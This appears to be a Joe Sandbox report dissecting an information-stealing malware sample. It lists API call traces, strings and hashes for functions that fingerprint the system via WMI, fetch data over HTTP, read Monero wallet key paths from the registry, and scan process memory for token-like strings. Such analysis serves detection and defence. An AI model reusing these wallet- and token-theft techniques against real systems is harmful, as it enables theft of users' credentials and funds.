                                                                                                                                                                                                                                                    • API String ID: 1973479514-0
                                                                                                                                                                                                                                                    • Opcode ID: 5012476852176868ef945010464283c51a97dd3ca2d032bb01084a23f2ab6f34
                                                                                                                                                                                                                                                    • Instruction ID: 8fddc4af80e3dbd37135efe277da34fbbe6ba5680e090d4315f81efce9e17b35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5012476852176868ef945010464283c51a97dd3ca2d032bb01084a23f2ab6f34
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF025E71800259EADB14EBE4DC55FEEBB79AF25304F10817EF50273292DA786A08CB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410EE0 Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 166memorycomtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?,00427208,00000000), ref: 00410F03
                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220), ref: 00410F14
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00427AC0,00000000,00000001,004279F0,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000), ref: 00410F2E
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(00427208,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220,00000000), ref: 00410F67
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00410FC6
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: CoCreateInstance.OLE32(00427870,00000000,00000001,00427090,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?), ref: 00410E3D
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: SysAllocString.OLEAUT32(?), ref: 00410E4C
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: _wtoi64.MSVCRT ref: 00410E92
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: SysFreeString.OLEAUT32(?), ref: 00410EA8
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: SysFreeString.OLEAUT32(00000000), ref: 00410EAB
                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32( rB,?,?,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?), ref: 00411000
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?), ref: 0041100C
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?,00427208), ref: 00411013
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00411057
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041103F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID: rB$%d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                    • API String ID: 1611285705-2786575689
                                                                                                                                                                                                                                                    • Opcode ID: e835d375b00eda815e6aeb2231f5cc4e25ca783def310913ebefd7b847a3b305
                                                                                                                                                                                                                                                    • Instruction ID: 7cd4933a7983ce8dfb3750eb97910b9d10a0434fcabc44e9c17a350ef5abf88e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e835d375b00eda815e6aeb2231f5cc4e25ca783def310913ebefd7b847a3b305
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36516B71A41229BBCB20DF95DC45EEFBB7CEF49B10F00411AF605A7280D7789A41CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00405960 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 200networkfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405A7A
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405A98
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,0041FC49), ref: 00405AE5
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,0041FC49), ref: 00405B3B
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405B46
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00405B50
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405B5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$GET$k:A$k:A
                                                                                                                                                                                                                                                    • API String ID: 1851261701-3118052421
                                                                                                                                                                                                                                                    • Opcode ID: 76f035bfd736e22dddb9130d6b9ca766e22c9a7d25987a564a79ca6cc8bffafa
                                                                                                                                                                                                                                                    • Instruction ID: e13faa250e6eb6cbe25700fe933ef2aae1ec931dfedd094e0f55e824132fca57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76f035bfd736e22dddb9130d6b9ca766e22c9a7d25987a564a79ca6cc8bffafa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55615071900619AFEB10DBA4DC85FEFB779EB45704F00417AFA05B3281DB786E488BA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00412200 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00412246
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004122D3
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00412310
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00412359
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004123A2
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004123EA
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412575
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00412602
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                    • API String ID: 2610293679-2658103896
                                                                                                                                                                                                                                                    • Opcode ID: f0b5f581fed10edef51dfef6d1f6c2a495bb918cc99b8adf69391641848679d5
                                                                                                                                                                                                                                                    • Instruction ID: d9accbe6c05d182cea38f1a7832678247f6e6f1013faaf62aa86627fe16bc035
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0b5f581fed10edef51dfef6d1f6c2a495bb918cc99b8adf69391641848679d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36C1EB75800209BBCB14EBA5DD85EEE7779AF14304F00416EF506B3292EF389B49CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00404B20 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194networkmemoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404B7B
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404B82
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404BA0
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 00404BB6
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BE1
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00404C1B
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404C40
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C52
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404C74
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404CE4
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404D15
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404D1F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00404D29
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID: GET
                                                                                                                                                                                                                                                    • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                    • Opcode ID: 10fba125b52c53bc4a6c6711d864ecfe3de4c648aed4fc0020dfca006d60d7d5
                                                                                                                                                                                                                                                    • Instruction ID: 81e5f17cc12bb17e4ae93cf02df35bcb861b0150f87df068acd63c6663157ddd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10fba125b52c53bc4a6c6711d864ecfe3de4c648aed4fc0020dfca006d60d7d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 036176B5A00219ABEB20DB94DC45FEF77B9EB49B10F104129FA15F72C0D778A904CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00401C70 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 199memorystringregistryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401CA4
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401CBA
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401CC1
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,004020C5), ref: 00401CDE
                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(004020C5,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401CF8
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00401D10
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00401D1D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.keys), ref: 00401D38
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401EBD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heaplstrcatmemset$AllocCreateObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                    • API String ID: 1905561306-218353709
                                                                                                                                                                                                                                                    • Opcode ID: 77bdd9d0a783aa6754d65fc02952459317b2051bd720cf6b6c68d20e3c3f83c4
                                                                                                                                                                                                                                                    • Instruction ID: 54ad93142447118491acc52e9b3620915a549fb7fce45cb0df2b52846e244455
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77bdd9d0a783aa6754d65fc02952459317b2051bd720cf6b6c68d20e3c3f83c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98718E71900248EADB14EBE4DC46BEEBB78AF18704F14416EF606731D1DB782608CB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004106B0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 210registrystringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000000,015C66D8,00000000,00020019,00000000,00426ED7,?,00000001), ref: 0041070F
                                                                                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(00000000,?,?,8sB,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041076E
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00410797
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 004107B5
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,015D1FD0,00000000,000F003F,?,00000400), ref: 004107E5
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004107FA
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,015D2090,00000000,000F003F,?,00000400,00000000,004215C1,?,00000000,?,00426F08), ref: 0041087E
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: - $%s\%s$8sB$8sB$?
                                                                                                                                                                                                                                                    • API String ID: 1989970852-2223034584
                                                                                                                                                                                                                                                    • Opcode ID: 6e9cc29cedf02d5a0232320bc201b4376dfe0e9eb4ff36cf6f91603027a30d76
                                                                                                                                                                                                                                                    • Instruction ID: aee864b9c10349cba499ed31a837307aac5521d20f6d4224747c876d86ab36c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e9cc29cedf02d5a0232320bc201b4376dfe0e9eb4ff36cf6f91603027a30d76
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83815E7590422DABCB14DB95DC44EEEB7B9FF48704F10416DE505B3281DB386A08CBB4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040F9D0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9FB
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FA23
                                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FA44
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA80
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FADB
                                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FB2E
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FB7A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • N0ZWFt, xrefs: 0040FB29, 0040FB39
                                                                                                                                                                                                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FA96, 0040FB93
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
